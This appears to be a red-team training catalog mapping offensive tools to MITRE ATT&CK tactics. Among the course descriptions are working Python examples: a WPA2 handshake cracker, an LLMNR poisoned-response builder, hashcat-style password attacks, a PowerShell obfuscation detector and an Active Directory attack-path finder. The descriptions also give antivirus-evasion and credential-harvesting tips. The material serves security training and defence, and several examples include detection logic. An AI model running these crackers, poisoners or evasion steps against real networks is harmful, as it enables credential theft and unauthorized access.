Red Team Tools

Authors: Aaron Rosenmund, Matt Glass, Ricardo Reimao, Lee Allen, Dawid Czagan, Rishalin Pillay, Guillaume Ross

MITRE ATT&CK® is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a

The PRE-ATT&CK section outlines tools used to achieve the following outcomes:
  • Technical Information Gathering
  • Technical Weakness Identification
  • Build Capabilities
The ATT&CK section outlines tools used to achieve the following outcomes:
  • Initial Access
  • Execution
  • Persistence
  • Privilege Escalation
  • Defense Evasion
  • Credential Access
  • Discovery
  • Lateral Movement
  • Collection
  • Command and Control
  • Exfiltration
  • Impact

What you will learn

  • What the tool is and does
  • Where to get it
  • Why I want to use it

Prerequisites

  • Security fundamentals
  • Understanding the concepts of security testing

Introduction

The first course in this series discusses leveraging the MITRE ATT&CK framework, in combination with the open-source tools covered in the Red Team Tools path, to emulate adversary attacks.

Red Team Tools for Emulated Adversary Techniques with MITRE ATT&CK

by Aaron Rosenmund

Apr 30, 2020 / 17m

Description

Resources and time are limited, and validation of security operations capabilities and defenses is elusive if not non-existent. Red team operations of all shapes and sizes fill this gap, but where do you start? In this course, Red Team Tools for Emulated Adversary Techniques with MITRE ATT&CK, you will gain the ability to prioritize and emulate techniques based on the threat groups with the capability and intent to threaten your organization. First, you will learn about the different ways red team expertise is implemented within organizations. Next, you will discover the relationship between the tools in this path and the MITRE ATT&CK techniques used by APT groups. Finally, you will explore how to operationalize adversary threat intelligence with ATT&CK Navigator. When you are finished with this course, you will have the skills and knowledge of red team tools for emulated adversary techniques with MITRE ATT&CK needed to leverage the Red Team Tools path to emulate threats and validate your organization's security operations.

Table of contents
  1. Course Overview
  2. Red Team Tools for Emulated Adversary Techniques with MITRE ATT&CK
  3. Resources

PRE-ATT&CK - Build Capabilities (TA0024)

Building capabilities consists of developing and/or acquiring the software, data and techniques used at different phases of an operation. This is the process of identifying development requirements and implementing solutions such as malware, delivery mechanisms, obfuscation/cryptographic protections, and call back and O&M functions.

Privilege Escalation and Client Execution with MSFVenom

by Matt Glass

Jan 21, 2020 / 24m

Description

Would you like to learn how to use a tool that generates payloads for you? In this course, Privilege Escalation and Client Execution with MSFVenom, you will gain the ability to generate a variety of shellcode payloads to fit your exploit, target, and situation. First, you will learn how to generate a payload within a standalone executable. Next, you will discover the options within MSFVenom that change the payload's capabilities. Finally, you will explore how to generate a payload for use in an existing exploit. Keep in mind that stock MSFVenom output is widely signatured by anti-virus products, so in a live engagement it usually needs additional obfuscation or a custom loader before it will run on a defended host. When you are finished with this course, you will have the skills and knowledge of payload generation with MSFVenom needed to exploit vulnerabilities.

Table of contents
  1. Tool Introduction
  2. Privilege Escalation and Client Execution
  3. Resources

ATT&CK - Initial Access (TA0001)

Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spear phishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.

Initial Access with Aircrack-ng

by Ricardo Reimao

Feb 14, 2020 / 21m

Description

Exploiting wireless networks is one of the most effective ways to get access to the internal network of a company. It usually gives you the same level of access as regular employees in the office, and Wi-Fi networks can often be reached from outside the building. In this course, Initial Access with Aircrack-ng, we explore the Aircrack-ng Wi-Fi security assessment suite. First, you will see how to identify potential target networks and exploit weaknesses in both WEP and WPA/WPA2. Then, you will learn how to recover the keys of WEP networks and how to brute-force the pre-shared keys of WPA/WPA2 networks from a captured handshake. Finally, you will discover how to cause a denial of service on the Wi-Fi network, which can be a good distraction for a bigger attack. By the end of this course, you will be able to emulate, and therefore defend against, three techniques from the MITRE ATT&CK framework: Wi-Fi Access Points (Initial Access - T1465), Brute Force (Credential Access - T1110), and Denial of Service (Impact - T1464).
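What the WPA/WPA2 brute-force step above actually computes, as an added example in Python rather than aircrack-ng's own code: each candidate passphrase is stretched to a PMK with PBKDF2, the PTK is derived from the two MAC addresses and two nonces seen in the handshake, and the KCK (the first 16 bytes of the PTK) is used to recompute the EAPOL-Key MIC of message 2. Only the correct passphrase reproduces the captured MIC. The handshake is constructed in-script from a known passphrase so the example runs offline; the SSID, MAC addresses, nonces and wordlist are made up for the example.

```python
"""Dictionary attack on a captured WPA2-PSK four-way handshake (added example)."""
from dataclasses import dataclass
import hashlib
import hmac
from typing import Iterable, Optional


@dataclass
class Handshake:
    """Everything a cracker needs from a capture of handshake message 2."""
    ssid: str
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes
    snonce: bytes
    eapol: bytes  # the EAPOL-Key frame of message 2 with its MIC field zeroed
    mic: bytes    # the 16-byte MIC as it appeared in the capture


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    # This is the slow step, which is why wordlist quality matters more than raw speed.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-512(PMK, "Pairwise key expansion",
    #               min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 20 bytes of HMAC-SHA1 output covers the 64 bytes needed
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    # WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame)[:16]; KCK = PTK[0:16]
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose derived KCK reproduces the captured MIC."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs.ssid)
        kck = derive_ptk(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, hs.eapol), hs.mic):
            return candidate
    return None


def _eapol_message2(snonce: bytes) -> bytes:
    # Constructed EAPOL-Key frame (message 2, MIC field zeroed) in the layout a cracker
    # reassembles from a capture; the MIC covers these bytes exactly as laid out here.
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
    body = (b"\x02"                    # descriptor type: RSN
            + b"\x01\x0a"              # key info: version 2 (HMAC-SHA1), pairwise, MIC present
            + b"\x00\x10"              # key length
            + b"\x00" * 7 + b"\x01"    # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)   # nonce, IV, RSC, ID
            + bytes(16)                # MIC, zeroed for the computation
            + len(rsn_ie).to_bytes(2, "big") + rsn_ie)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v1, type Key


def build_constructed_capture(passphrase: str) -> Handshake:
    """Stand-in for parsing a .cap file: build a handshake from a known passphrase (made-up values)."""
    ssid, ap_mac, sta_mac = "CorpWiFi", bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    eapol = _eapol_message2(snonce)
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol, eapol_mic(kck, eapol))


CAPTURE = build_constructed_capture("Summer2020!")
WORDLIST = ["password", "letmein", "corpwifi", "Summer2020!", "Winter2020!"]

if __name__ == "__main__":
    print("recovered passphrase:", crack_handshake(CAPTURE, WORDLIST))
```

The cost per candidate is dominated by the 4096-round PBKDF2, and the PMK depends on the SSID, so a rainbow table only helps for networks that keep a default or very common SSID. That is also why renaming the SSID to something unique is a cheap defensive win on top of a long passphrase.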

Table of contents
  1. Tool Introduction
  2. WiFi Password Cracking with Aircrack-ng
  3. Resources

Initial Access with WiFi-Pumpkin

by Ricardo Reimao

Mar 20, 2020 / 22m

Description

Having valid credentials is one of the most effective ways of getting access to the internal network of a company. They give you the same level of access as the target employee, which often includes VPN access to the internal network as well as several external systems. In this course, Initial Access with WiFi-Pumpkin, you will explore the WiFi-Pumpkin tool, a rogue access point framework developed by Marcos Bomfim of P0cL4bs. First, you will learn how to create rogue access points that look exactly like the Wi-Fi network of your target company. Then, you will see how to set up captive portals so that when users connect to your rogue access point they are prompted for their domain credentials, which you can harvest and use in other attacks. Finally, you will walk through the full setup: standing up the rogue access point, configuring the fake captive portal, customizing the login page, and collecting the submitted credentials. By the end of this course, you will know two techniques from the MITRE ATT&CK framework: Rogue Wi-Fi Access Points (T1465) and Valid Accounts (T1078).

Table of contents
  1. Course Overview
  2. Credential Harvesting with Fake Captive Portals
  3. Resources

ATT&CK - Credential Access (TA0006)

Credential access represents techniques that can be used by adversaries to obtain access to or control over passwords, tokens, cryptographic keys, or other values that could be used by an adversary to gain unauthorized access to resources. Credential access allows the adversary to assume the identity of an account, with all of that account's permissions on the system and network, and makes it harder for defenders to detect the adversary. With sufficient access within a network, an adversary can create accounts for later use within the environment.

Credential Access with THC Hydra

by Lee Allen

Jan 27, 2020 / 22m

Description

There's no way around it: people are going to use weak passwords. THC Hydra will help you identify them so that you can use the information in red or blue team efforts. In this course, Credential Access with THC Hydra, you will learn how to brute-force network logins. First, you will see where THC Hydra fits into the kill chain and the MITRE ATT&CK framework. Next, you will discover how the flexibility of THC Hydra helps you guess passwords against a wide range of network protocols. Finally, you will explore how to apply THC Hydra to your own penetration testing or password strength assessment activities. Because Hydra guesses against live services rather than offline hashes, every attempt is visible to the target and counts toward account lockout thresholds, so tune the thread count, wordlist and attempt rate to the engagement before you start. When you are finished with this course, you will have the skills and knowledge needed to use THC Hydra efficiently in your password guessing efforts.

Table of contents
  1. Course Overview
  2. Password Cracking with THC Hydra
  3. Resources

Credential Access with Mimikatz

by Lee Allen

Mar 30, 2020 / 25m

Description

Would you like to be able to see clear text credentials stored in memory? How about harvesting clear text credentials stored in protected files? In this course, Credential Access with Mimikatz, you will learn how to leverage the advanced credential access capabilities of the open-source Mimikatz project in post-exploitation activities. First, you will see how to harvest password hashes and clear text user names and passwords for active logon sessions held in system memory. Next, you will discover how Mimikatz can open memory dumps taken from other systems, for situations where you cannot run Mimikatz on the victim machine itself. Finally, you will explore how to obtain clear text usernames and passwords stored by browsers, change domain user passwords on the fly, and capture passwords to a file. When you are finished with this course, you will have the skills and knowledge of the open-source Mimikatz tool needed to emulate credential access techniques aligned with MITRE ATT&CK.

Table of contents
  1. Tool Introduction
  2. Credential Access and Persistence with Mimikatz
  3. Resources

Credential Access with Responder

by Ricardo Reimao

Apr 2, 2020 / 20m

Description

One of the main objectives of a red team engagement is to get access to several user accounts (lateral movement) as well as administrator accounts (privilege escalation). After getting initial access to the internal network, you can launch several attacks to harvest credentials. In this course, Credential Access with Responder, you will explore one of the most important tools for lateral movement and privilege escalation: Responder, an LLMNR, NBT-NS and mDNS poisoner developed by Laurent Gaffie. First, you will abuse the LLMNR name-resolution protocol. Then, you will use the NBT-NS and mDNS protocols to gather the credentials of domain users. Finally, you will learn not only how to capture NTLM authentication hashes, but also how to crack them to get plain text passwords and how to use recovered credentials in pass-the-hash attacks. Note that what Responder captures is a Net-NTLMv2 challenge-response, not an NT hash: it can be cracked offline or relayed to another host while the authentication is in progress, but it cannot itself be replayed in a pass-the-hash attack. By the end of this course, you will know two techniques from the MITRE ATT&CK framework: LLMNR/NBT-NS Poisoning and Relay (T1171) and Network Sniffing (T1040).
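The LLMNR exchange the course abuses, shown as the two UDP payloads involved. This is an added example in Python and is not Responder's code. A Windows host whose DNS lookup for a single-label name fails multicasts an LLMNR query (RFC 4795, a DNS-like wire format) to 224.0.0.252 on UDP port 5355; a poisoner on the same segment answers with its own address, the victim connects to it, and the NTLM authentication that follows is what Responder captures. Both packets are constructed in-script so the example runs offline; the hostname, transaction IDs and IP addresses are made up. The canary check at the end is the defender's side of the same exchange: a query for a name that does not exist should never get an answer, so any answer identifies a poisoner.

```python
"""LLMNR query, poisoned answer, and a canary check for poisoners (added example)."""
import socket
import struct
from typing import Optional, Tuple

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355  # where Windows sends the query
QTYPE_A, QCLASS_IN = 1, 1
FLAG_RESPONSE = 0x8000  # QR bit of the flags word


def encode_name(name: str) -> bytes:
    return b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"


def decode_name(pkt: bytes, offset: int) -> Tuple[str, int]:
    labels = []
    while True:
        length = pkt[offset]
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        labels.append(pkt[offset:offset + length].decode())
        offset += length


def build_query(txid: int, name: str, qtype: int = QTYPE_A) -> bytes:
    """Victim side: header (ID, flags, QD=1, AN=0, NS=0, AR=0) followed by one question."""
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)


def parse_query(pkt: bytes) -> Tuple[int, str, int]:
    txid, flags, qdcount, _, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    if flags & FLAG_RESPONSE or qdcount != 1:
        raise ValueError("not a single-question LLMNR query")
    name, off = decode_name(pkt, 12)
    qtype, _ = struct.unpack("!HH", pkt[off:off + 4])
    return txid, name, qtype


def build_poisoned_response(query: bytes, attacker_ip: str, ttl: int = 30) -> Optional[bytes]:
    """Poisoner side: echo the transaction ID and question, then claim the name with one A record."""
    txid, name, qtype = parse_query(query)
    if qtype != QTYPE_A:
        return None  # this example only answers IPv4 lookups
    header = struct.pack("!HHHHHH", txid, FLAG_RESPONSE, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)
    answer = encode_name(name) + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4) + socket.inet_aton(attacker_ip)
    return header + question + answer


def parse_response(pkt: bytes) -> Tuple[int, str, str]:
    """Return (txid, answered name, IPv4 address) from a response carrying one A record."""
    txid, flags, _, ancount, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    if not flags & FLAG_RESPONSE or ancount < 1:
        raise ValueError("not an LLMNR response with an answer")
    _, off = decode_name(pkt, 12)
    off += 4  # skip QTYPE/QCLASS of the echoed question
    name, off = decode_name(pkt, off)
    rtype, _, _, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
    off += 10
    if rtype != QTYPE_A or rdlen != 4:
        raise ValueError("unexpected record type")
    return txid, name, socket.inet_ntoa(pkt[off:off + 4])


def canary_check(canary_name: str, response: bytes) -> Optional[str]:
    """Defender side: we asked for a name that must not exist; whoever answers is poisoning."""
    try:
        _, name, ip = parse_response(response)
    except ValueError:
        return None
    return ip if name.lower() == canary_name.lower() else None


if __name__ == "__main__":
    query = build_query(0x1234, "fileserv01")              # victim mistypes a server name
    poisoned = build_poisoned_response(query, "10.0.0.66")  # attacker claims to be it
    print(parse_response(poisoned))                         # (4660, 'fileserv01', '10.0.0.66')
    canary = build_query(7, "nosuchhost-7f3a")
    print(canary_check("nosuchhost-7f3a", build_poisoned_response(canary, "10.0.0.66")))
```

The canary pattern is how tools that hunt for Responder work: resolve a random name over LLMNR and NBT-NS a few times an hour and alert on any reply. The durable fix is to disable LLMNR and NetBIOS name resolution by Group Policy, since no legitimate answer is ever expected on a domain network with working DNS.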

Table of contents
  1. Course Overview
  2. LLMNR/NBT-NS Poisoning with Responder
  3. Resources

Credential Access with Hashcat

by Dawid Czagan

May 4, 2020 / 28m

Description

Red team members and penetration testers need to know how to crack passwords with different password cracking techniques. In this course, Credential Access with Hashcat, you will learn about Hashcat, the leading offline password cracker. First, you will see how to launch a dictionary attack using Hashcat. Next, you will discover how to crack more passwords by launching a dictionary attack with a rule. Then, you will learn how to launch a dictionary attack with a mask, also known as a hybrid attack. Finally, you will explore how to use Hashcat to crack password-protected PDF and DOCX files. By the end of this course, you will know how to use Hashcat to crack passwords with different password cracking techniques.
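The three attack modes the course walks through, re-implemented on a toy scale so the candidate space each one explores is visible. This is an added example in Python, not hashcat itself: it mirrors what -a 0 (straight dictionary), -a 0 -r rules.txt (dictionary with rules) and -a 6 (hybrid wordlist plus mask) try, using the same rule and mask syntax. The hashes are SHA-256 (hashcat mode 1400) of constructed passwords, the wordlist and rules are made up for the example, and the rule interpreter covers only a handful of hashcat's rule functions.

```python
"""Dictionary, rule-based and hybrid mask attacks, hashcat style (added example)."""
import hashlib
import itertools
import string
from typing import Dict, Iterable, List, Set

# hashcat's built-in mask charsets ?l ?u ?d ?s
CHARSETS = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
}


def digest(candidate: str) -> str:
    return hashlib.sha256(candidate.encode()).hexdigest()


def apply_rule(word: str, rule: str) -> str:
    """Apply one rule line in hashcat syntax (functions separated by spaces).
    Supported here: ':' (no-op) l u c r $X ^X sXY."""
    i = 0
    while i < len(rule):
        op = rule[i]
        if op in (" ", ":"):
            i += 1
        elif op == "l":
            word, i = word.lower(), i + 1
        elif op == "u":
            word, i = word.upper(), i + 1
        elif op == "c":
            word, i = word[:1].upper() + word[1:].lower(), i + 1
        elif op == "r":
            word, i = word[::-1], i + 1
        elif op == "$":
            word, i = word + rule[i + 1], i + 2
        elif op == "^":
            word, i = rule[i + 1] + word, i + 2
        elif op == "s":
            word, i = word.replace(rule[i + 1], rule[i + 2]), i + 3
        else:
            raise ValueError(f"rule function {op!r} is not implemented in this example")
    return word


def expand_mask(mask: str) -> Iterable[str]:
    """Yield every string matching a mask such as ?d?d?d?d or ?u?l?l!; other characters are literal."""
    slots: List[str] = []
    i = 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask) and mask[i + 1] in CHARSETS:
            slots.append(CHARSETS[mask[i + 1]])
            i += 2
        else:
            slots.append(mask[i])
            i += 1
    return ("".join(t) for t in itertools.product(*slots))


def _try(candidates: Iterable[str], remaining: Set[str], found: Dict[str, str]) -> None:
    for cand in candidates:
        if not remaining:
            return
        h = digest(cand)
        if h in remaining:
            found[h] = cand
            remaining.discard(h)


def dictionary_attack(hashes: Iterable[str], wordlist: Iterable[str],
                      rules: Iterable[str] = (":",)) -> Dict[str, str]:
    """-a 0: every word transformed by every rule (':' alone is a plain dictionary run)."""
    remaining, found = set(hashes), {}
    rule_list = list(rules)
    _try((apply_rule(w, r) for w in wordlist for r in rule_list), remaining, found)
    return found


def hybrid_attack(hashes: Iterable[str], wordlist: Iterable[str], mask: str) -> Dict[str, str]:
    """-a 6: each word followed by every expansion of the mask."""
    remaining, found = set(hashes), {}
    _try((w + suffix for w in wordlist for suffix in expand_mask(mask)), remaining, found)
    return found


# Constructed targets. In a real engagement the hashes come from a dump and the plaintexts are unknown.
SECRETS = ("summer", "p@ssw0rd", "winter2020")
TARGET_HASHES = [digest(s) for s in SECRETS]
WORDLIST = ["summer", "password", "winter"]
RULES = [":", "c", "sa@ so0", "$1 $2 $3", "c $2 $0 $2 $0"]

if __name__ == "__main__":
    print("plain dictionary:", dictionary_attack(TARGET_HASHES, WORDLIST))
    print("with rules:      ", dictionary_attack(TARGET_HASHES, WORDLIST, RULES))
    print("hybrid ?d?d?d?d: ", hybrid_attack(TARGET_HASHES, WORDLIST, "?d?d?d?d"))
```

The plain run recovers only "summer"; the rule run adds "p@ssw0rd" (the leet rule applied to "password"); the hybrid run adds "winter2020". The point is the multiplier: a rule file with a few hundred lines or a four-digit mask turns a modest wordlist into millions of candidates, which is why a rule or mask pass is usually worth running before any true brute force.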

Table of contents
  1. Course Overview
  2. Password Cracking with Hashcat
  3. Resources

Credential Access with John the Ripper

by Rishalin Pillay

May 22, 2020 / 23m

Description

Password cracking is a common task in a red team engagement, and learning the tools can be daunting. In this course, Credential Access with John the Ripper, you will gain the ability to crack commonly used password hashes with the highly customizable John the Ripper. First, you will learn how to navigate John's syntax and boost your cracking capabilities by obtaining rich wordlists and permuting them. Next, you will discover how to crack the password hashes of common operating systems such as Windows and Linux. Finally, you will explore how to use John from within a Metasploit session, so that you can crack passwords during the exploitation phase. When you are finished with this course, you will have the skills and knowledge of John the Ripper needed to amplify your red team engagements when performing password cracking.

Table of contents
  1. Course Overview
  2. Credential Dumping and Brute Force Capabilities of John the Ripper
  3. Resources

ATT&CK - Defense Evasion (TA0005)

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

Defense Evasion with Invoke-Obfuscation

by Ricardo Reimao

Apr 10, 2020 / 24m

Description

One of the main objectives of a red team engagement is not to get caught by the client's detection mechanisms. If you simply run your malicious code on a production server, you will most likely be caught by Windows Defender or the anti-virus solution. For this reason, obfuscating scripts to bypass those detection mechanisms is essential. In this course, Defense Evasion with Invoke-Obfuscation, you will explore how to bypass detection tools such as anti-virus solutions by obfuscating your malicious scripts. First, you will learn what script obfuscation is and how you can use it in your red team engagement. Then, you will see how to install the tool in Kali Linux. Finally, you will explore how to use Invoke-Obfuscation to bypass the anti-virus and run a malicious payload on a fully patched Windows server. Keep in mind that obfuscation defeats static, signature-based matching only: PowerShell script block logging (PowerShell 5 and later) records each layer as it is executed and AMSI scans content just before it runs, so mature defenders can still see the de-obfuscated script and you should plan your tradecraft accordingly. By the end of this course, you will know how to use the Invoke-Obfuscation PowerShell tool to obfuscate other PowerShell scripts with the intent of evading detection. This course covers two techniques from the MITRE ATT&CK framework: Obfuscated Files or Information (T1027) and Deobfuscate/Decode Files or Information (T1140).
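The detection side of the technique above, as an added example in Python; it is not part of Invoke-Obfuscation and the regular expressions and thresholds are this example's own choices rather than any vendor's signatures. Invoke-Obfuscation output leaves characteristic traces in a process command line: the -EncodedCommand family, the -f format operator reassembling string fragments, [char] arithmetic, backticks inside identifiers, and strings invoked with &(...). The scorer counts those traces over constructed command lines of the kind a Sysmon event 1 or Windows event 4688 would record, and decode_encoded_command() performs the T1140 step for the base64/UTF-16LE case. The sample command lines and the encoded payload are constructed for the example.

```python
"""Scoring process command lines for PowerShell obfuscation and decoding -EncodedCommand (added example)."""
import base64
import re
from typing import List, Optional, Tuple

# Each indicator is (name, regex). Patterns are deliberately loose; tune them to your telemetry.
INDICATORS = [
    ("encoded command",   re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+[A-Za-z0-9+/=]{16,}")),
    ("format operator",   re.compile(r"\{\d+\}[^\n]*?-f\s")),
    ("char codes",        re.compile(r"(?i)\[char\]\s*(?:0x[0-9a-f]+|\d+)")),
    ("backtick in token", re.compile(r"[A-Za-z]`[A-Za-z]")),
    ("invoked string",    re.compile(r"[&.]\s*\(\s*['\"]")),
    ("concat chain",      re.compile(r"(?:['\"][^'\"]{1,4}['\"]\s*\+\s*){3,}")),
    ("join/reverse",      re.compile(r"(?i)-join\b|\[string\]::join|\[array\]::reverse|\.tochararray\(\)")),
]


def symbol_ratio(cmdline: str) -> float:
    """Share of characters that are neither alphanumeric nor whitespace."""
    if not cmdline:
        return 0.0
    return sum(1 for ch in cmdline if not (ch.isalnum() or ch.isspace())) / len(cmdline)


def score_command_line(cmdline: str) -> Tuple[int, List[str]]:
    """Return (score, matched indicator names); 0 means nothing suspicious was seen."""
    hits = [name for name, rx in INDICATORS if rx.search(cmdline)]
    # Heavily obfuscated lines are dominated by quotes, braces and operators.
    if len(cmdline) > 60 and symbol_ratio(cmdline) > 0.30:
        hits.append("symbol density")
    return len(hits), hits


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """T1140 for the -EncodedCommand case: the argument is base64 of UTF-16LE script text."""
    m = INDICATORS[0][1].search(cmdline)
    if not m:
        return None
    b64 = m.group(0).split()[-1]
    try:
        return base64.b64decode(b64).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdlines: List[str]) -> List[Tuple[int, List[str], Optional[str]]]:
    """Score every line and attach the decoded script where one is present."""
    return [(*score_command_line(c), decode_encoded_command(c)) for c in cmdlines]


# Constructed samples. The encoded payload is built here from a harmless script.
_ENC = base64.b64encode("Write-Host hi".encode("utf-16le")).decode()
SAMPLE_COMMAND_LINES = [
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    f"powershell.exe -NoP -W Hidden -Enc {_ENC}",
    r'''powershell.exe -c "&('I'+'EX') (\"{1}{0}\" -f ' hi','Write-Host')"''',
    r'''powershell.exe -c "I`E`X (-join ([char]87,[char]114,[char]105,[char]116,[char]101))"''',
]

if __name__ == "__main__":
    for line, (score, hits, decoded) in zip(SAMPLE_COMMAND_LINES, triage(SAMPLE_COMMAND_LINES)):
        print(score, hits, decoded, "<-", line[:60])
```

Score on the command line alone is a first pass. The stronger signal is the script block log (event 4104), where the same indicators can be run against the de-obfuscated text PowerShell records at execution time, which is why the caveat in the description matters to both sides of the engagement.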

Table of contents
  1. Course Overview
  2. Bypassing Anti-virus Detection with Invoke-Obfuscation
  3. Resources

ATT&CK - Discovery (TA0007)

Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act. They also allow adversaries to explore what they can control and what’s around their entry point in order to discover how it could benefit their current objective. Native operating system tools are often used toward this post-compromise information-gathering objective.

Discovery with BloodHound

by Guillaume Ross

Apr 20, 2020 / 21m

Description

Understanding the relationships between thousands of Active Directory objects can be difficult. Users are members of groups, which can be nested in other groups and linked to thousands of permissions. In this course, Discovery with BloodHound, you will gain the ability to use BloodHound to quickly find the shortest path to compromising systems in an Active Directory environment. First, you will learn how to install BloodHound. Next, you will discover how to use SharpHound to collect data from AD. Finally, you will explore how to ingest and visualize that data, finding paths between objects and the ultimate goal, Domain Admin access. When you are finished with this course, you will have the skills and knowledge of BloodHound needed to start using it to attack AD, or to understand how to better defend it.
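The query at the heart of BloodHound, stripped to its essentials as an added example in Python; it is not BloodHound or SharpHound code and uses no Neo4j. Nodes are users, groups and computers, edges are the relationships SharpHound collects (MemberOf, AdminTo, HasSession, GenericAll, and so on), and an attack path is any walk from a node you control to a high-value target. A breadth-first search over a small constructed domain answers the "shortest path to Domain Admins" question; every principal name is made up and the edge kinds are a subset of the ones BloodHound knows.

```python
"""Shortest attack path through Active Directory relationships, BloodHound style (added example)."""
from collections import deque
from typing import Dict, List, Optional, Tuple

Edge = Tuple[str, str, str]  # (source, relationship, target)

# Constructed domain CORP.LOCAL. Each edge reads "source --relationship--> target" and can be
# traversed by an attacker who controls the source (the direction SharpHound records them in).
EDGES: List[Edge] = [
    ("ALICE@CORP.LOCAL",        "MemberOf",   "DOMAIN USERS@CORP.LOCAL"),
    ("ALICE@CORP.LOCAL",        "MemberOf",   "HELPDESK@CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL",     "AdminTo",    "WS01.CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL",     "CanRDP",     "WS02.CORP.LOCAL"),
    ("WS01.CORP.LOCAL",         "HasSession", "BOB@CORP.LOCAL"),       # admin on WS01 can take Bob's creds
    ("BOB@CORP.LOCAL",          "MemberOf",   "IT ADMINS@CORP.LOCAL"),
    ("IT ADMINS@CORP.LOCAL",    "GenericAll", "DOMAIN ADMINS@CORP.LOCAL"),  # full control: can add members
    ("DOMAIN USERS@CORP.LOCAL", "CanRDP",     "WS02.CORP.LOCAL"),
    ("CAROL@CORP.LOCAL",        "MemberOf",   "DOMAIN USERS@CORP.LOCAL"),
    ("DAVE@CORP.LOCAL",         "MemberOf",   "DOMAIN ADMINS@CORP.LOCAL"),
]
TARGET = "DOMAIN ADMINS@CORP.LOCAL"


def build_adjacency(edges: List[Edge]) -> Dict[str, List[Tuple[str, str]]]:
    adj: Dict[str, List[Tuple[str, str]]] = {}
    for src, rel, dst in edges:
        adj.setdefault(src, []).append((rel, dst))
        adj.setdefault(dst, [])
    return adj


def shortest_path(edges: List[Edge], start: str, target: str) -> Optional[List[Edge]]:
    """Breadth-first search over directed edges; the hop list, or None when no path exists."""
    adj = build_adjacency(edges)
    if start not in adj or target not in adj:
        return None
    parent: Dict[str, Optional[Edge]] = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            path: List[Edge] = []
            while parent[node] is not None:
                edge = parent[node]
                path.append(edge)
                node = edge[0]
            return path[::-1]
        for rel, nxt in adj[node]:
            if nxt not in parent:
                parent[nxt] = (node, rel, nxt)
                queue.append(nxt)
    return None


def principals_with_path(edges: List[Edge], target: str) -> List[str]:
    """Every node that can reach the target by some chain of edges: the real blast radius of a group."""
    nodes = {n for e in edges for n in (e[0], e[2])}
    return sorted(n for n in nodes if n != target and shortest_path(edges, n, target) is not None)


def render(path: Optional[List[Edge]]) -> str:
    if not path:
        return "(no path)"
    return " ".join(f"{src} -[{rel}]->" for src, rel, _ in path) + f" {path[-1][2]}"


if __name__ == "__main__":
    print(render(shortest_path(EDGES, "ALICE@CORP.LOCAL", TARGET)))
    print(render(shortest_path(EDGES, "CAROL@CORP.LOCAL", TARGET)))
    print(principals_with_path(EDGES, TARGET))
```

For Alice the search returns a five-hop path (HELPDESK membership, local admin on WS01, Bob's session there, Bob's IT ADMINS membership, GenericAll over Domain Admins) that no single group listing would reveal. The same function run for every node, as principals_with_path does, is the defender's view: it lists everyone who is effectively a Domain Admin, which is usually a much longer list than the group's direct members.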

Table of contents
  1. Course Overview
  2. Discovering the Path to Domain Admin with BloodHound
  3. Resources

Discovery with ADRecon

by Ricardo Reimao

Apr 23, 2020 / 22m

Description

